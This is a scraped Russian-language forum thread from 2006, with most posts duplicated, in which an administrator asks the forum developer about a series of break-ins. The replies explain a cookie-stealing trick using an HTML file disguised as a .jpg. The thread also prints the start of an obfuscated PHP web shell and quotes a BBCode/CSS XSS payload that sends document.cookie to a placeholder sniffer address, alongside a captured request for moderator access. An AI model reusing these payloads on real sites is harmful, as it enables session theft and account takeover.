cosc пишет:
Скажите, как это понимать?
Это спамерский бот пытался отправить свое сообщение в форме авторизации
cosc пишет:
C212121Tv_ - пароль пользователя Сaлтыkоff. Теперь конечно он сменил.
Здесь показывается неверно введенный пароль.
51. TvoyWeb - 10 Декабря, 2006 - 23:25:42 - перейти к сообщению
Это спамерский бот пытался отправить свое сообщение в форме авторизации
Здесь показывается неверно введенный пароль.
52. cosc - 11 Декабря, 2006 - 05:46:29 - перейти к сообщению
TvoyWeb
Ситуация тут у нас неожиданно резко усложнилась. Так или иначе этот хакер уже умудрился взломать учетки сразу 2 админов, несмотря на то, что пароли были вроде тех, что у Салтыkoff. Может посоветуете, в каком направлении копать?
Ситуация тут у нас неожиданно резко усложнилась. Так или иначе этот хакер уже умудрился взломать учетки сразу 2 админов, несмотря на то, что пароли были вроде тех, что у Салтыkoff. Может посоветуете, в каком направлении копать?
53. TvoyWeb - 11 Декабря, 2006 - 09:21:52 - перейти к сообщению
cosc
На днях выяснилось, (это не есть дыра форума, это глюки некоторых версий IE) можно загрузить файл с html кодом и обозвать его jpg, загрузить на форум. Форум не распознает в нем картинку и на страницу он будет выводиться как прикрепленный файл. Но после клика по ссылке закачать файл этот файл просто открывается в IE и исполняется JavaScript код который отсылает куки на снифер. остальное дело техники. Например мой IE не такой
то есть он не исполняет кода а показывает как картинку. Как правило такой подход к взлому нацелен на то, что админ юзает дырявый IE и кликнет по ссылке. Отсюда вывод ПЕРЕСТАНЬТЕ юзать глючный IE!
На днях выяснилось, (это не есть дыра форума, это глюки некоторых версий IE) можно загрузить файл с html кодом и обозвать его jpg, загрузить на форум. Форум не распознает в нем картинку и на страницу он будет выводиться как прикрепленный файл. Но после клика по ссылке закачать файл этот файл просто открывается в IE и исполняется JavaScript код который отсылает куки на снифер. остальное дело техники. Например мой IE не такой
то есть он не исполняет кода а показывает как картинку. Как правило такой подход к взлому нацелен на то, что админ юзает дырявый IE и кликнет по ссылке. Отсюда вывод ПЕРЕСТАНЬТЕ юзать глючный IE!
54. cosc - 11 Декабря, 2006 - 09:53:01 - перейти к сообщению
TvoyWeb
Я Maxthon использую на движке IE, не знаю актуально такое или нет.
Я Maxthon использую на движке IE, не знаю актуально такое или нет.
55. ETC - 11 Декабря, 2006 - 10:05:18 - перейти к сообщению
TvoyWeb
Но дырку-то закрой!
В смысле, достаточно просто проверять контент файла на наличие тега script и запретить заливку — пусть архивом код прикладывают.
Но дырку-то закрой!
В смысле, достаточно просто проверять контент файла на наличие тега script и запретить заливку — пусть архивом код прикладывают.
56. cosc - 11 Декабря, 2006 - 10:16:48 - перейти к сообщению
Кстати, тот шел, который залили первым, он начинается с такого:
Такое ощущение, что он прошел перекадировку форумом.\n\n(Добавление)
А скажите, по этому заголовку можно чего-нибудь полезное узнать, типа кто закачал и все такое?
CODE:
<?php
$language='ru';
$auth = 0;
$name='d41d8cd98f00b204e9800998ecf8427e';
$pass='d41d8cd98f00b204e9800998ecf8427e';
eval(gzinflate(base64_decode('7b1pcxtJkiD6WTTTf8hCswtACQRxkgQpssSb4E0QPCUtO4FMAikmjkICJMEq/bd
$language='ru';
$auth = 0;
$name='d41d8cd98f00b204e9800998ecf8427e';
$pass='d41d8cd98f00b204e9800998ecf8427e';
eval(gzinflate(base64_decode('7b1pcxtJkiD6WTTTf8hCswtACQRxkgQpssSb4E0QPCUtO4FMAikmjkICJMEq/bd
Такое ощущение, что он прошел перекадировку форумом.\n\n(Добавление)
А скажите, по этому заголовку можно чего-нибудь полезное узнать, типа кто закачал и все такое?
57. ETC - 11 Декабря, 2006 - 10:32:06 - перейти к сообщению
Это зашифрованный шел просто.
58. cosc - 19 Декабря, 2006 - 00:48:40 - перейти к сообщению
Нет, похоже эта история еще не закончилась.
Вчера у меня сменили пароль. И написали от моего имени сообщение.
Такое ощущение, что этот хакер имеет доступ в админку, потому что по-другому я просто не представляю, как можно сменить пароль.
НЕльзя ли ввести логи адмнки, что бы в них записывалось каждое посещение админи?
Вчера у меня сменили пароль. И написали от моего имени сообщение.
Такое ощущение, что этот хакер имеет доступ в админку, потому что по-другому я просто не представляю, как можно сменить пароль.
НЕльзя ли ввести логи адмнки, что бы в них записывалось каждое посещение админи?
59. TvoyWeb - 19 Декабря, 2006 - 12:09:01 - перейти к сообщению
cosc пишет:
НЕльзя ли ввести логи адмнки, что бы в них записывалось каждое посещение админи?
Это уже сделано но в новой версии. Так что потерпите малость.
Проверь все папки на форуме и сайте, может где еще есть шел.
60. cosc - 19 Декабря, 2006 - 12:51:28 - перейти к сообщению
Вот тут один пользователь написал следующее:
Интересно, актуально подобное или нет?
[video]http://1.ru e=`[/video]` style=display:none;background:url(javascript:document.images[12].src="http://адрес_сниффера.cgi?"+document.cookie) Lol
<div class='postcolor'> <embed width="400" height="300" src=http://1.ru e=` type="application/x-shockwave-video">` style=display:none;background:url(javascript:document.images[12].src="http://адрес_сниффера.cgi?="+document.cookie) <i>L</i>ol </div>
ПОДУМАЙТЕ, АДМИНЫ, ДЫРКИ ЗДЕСЬ МОГУТ БЫТЬ.
GET http://agtustud.agtu.ru/forum/topic.php?s=1d8809cb4bdf328df72255ed12a60f84&act=modcp&forum== HTTP/1.0
Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, application/x-shockwave-flash, */*
Accept-Language: ru
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)
Host: forum.web-hack.ru
Proxy-Connection: Keep-Alive
Cookie: session_id=97b928bab6cdc691336eb1cf507c2ff1; hotlog=1; MT=1; forum_read=a%3A1%3A%7Bi%3A1%3Bi%3A1085772263%3B%7D; member_id=xxxx; pass_hash=xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx; anonlogin=-1
А ТАК МОЖНО СТАТЬ МОДЕРОМ, НУ ИЛИ АДМИНОМ...
<div class='postcolor'> <embed width="400" height="300" src=http://1.ru e=` type="application/x-shockwave-video">` style=display:none;background:url(javascript:document.images[12].src="http://адрес_сниффера.cgi?="+document.cookie) <i>L</i>ol </div>
ПОДУМАЙТЕ, АДМИНЫ, ДЫРКИ ЗДЕСЬ МОГУТ БЫТЬ.
GET http://agtustud.agtu.ru/forum/topic.php?s=1d8809cb4bdf328df72255ed12a60f84&act=modcp&forum== HTTP/1.0
Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, application/x-shockwave-flash, */*
Accept-Language: ru
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)
Host: forum.web-hack.ru
Proxy-Connection: Keep-Alive
Cookie: session_id=97b928bab6cdc691336eb1cf507c2ff1; hotlog=1; MT=1; forum_read=a%3A1%3A%7Bi%3A1%3Bi%3A1085772263%3B%7D; member_id=xxxx; pass_hash=xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx; anonlogin=-1
А ТАК МОЖНО СТАТЬ МОДЕРОМ, НУ ИЛИ АДМИНОМ...
Интересно, актуально подобное или нет?